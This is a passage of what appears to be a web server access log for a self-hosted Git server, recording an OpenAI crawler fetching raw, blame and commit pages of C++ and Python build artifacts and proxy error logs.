(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17935] [Gzip 11.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 23048] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:15:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1555] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:15:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12858] [Gzip 5.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:15:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 28984] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 44535] [Gzip 32.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:15:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 160830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:15:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 91165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:15:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 16373] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:15:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17084] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17752] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10639] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:15:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 69316] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10639] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:15:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16418] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:15:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11618] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" +[17/Feb/2026:15:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10634] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:15:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 70871] [Gzip 17.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:15:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" +[17/Feb/2026:15:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 97752] [Gzip 28.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:15:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:15:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10203] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 14238122] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +[17/Feb/2026:15:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 98931] [Gzip 28.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:15:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10431] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11045] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:15:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17041] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12948] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:15:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr 